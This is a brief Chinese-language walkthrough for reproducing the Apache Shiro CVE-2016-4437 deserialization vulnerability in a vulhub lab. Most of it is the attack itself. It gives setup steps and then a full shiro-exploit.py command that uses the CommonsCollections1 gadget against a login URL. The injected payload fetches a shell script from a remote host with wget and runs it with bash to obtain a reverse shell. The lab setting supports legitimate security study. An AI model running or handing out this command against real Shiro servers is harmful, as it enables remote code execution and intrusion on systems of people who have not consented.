vulhub shiro CVE-2016-4437 漏洞复现

exp
jar包
将jar包放入exp文件夹
安装模块

1
pip3 install pycryptodome

将反弹shell wget后执行

1
python3 shiro-exploit.py echo -g CommonsCollections1 -u  http://x.x.x.x:8080/login -c  "wget http://x.x.x.x/x.sh ; bash ./x.sh"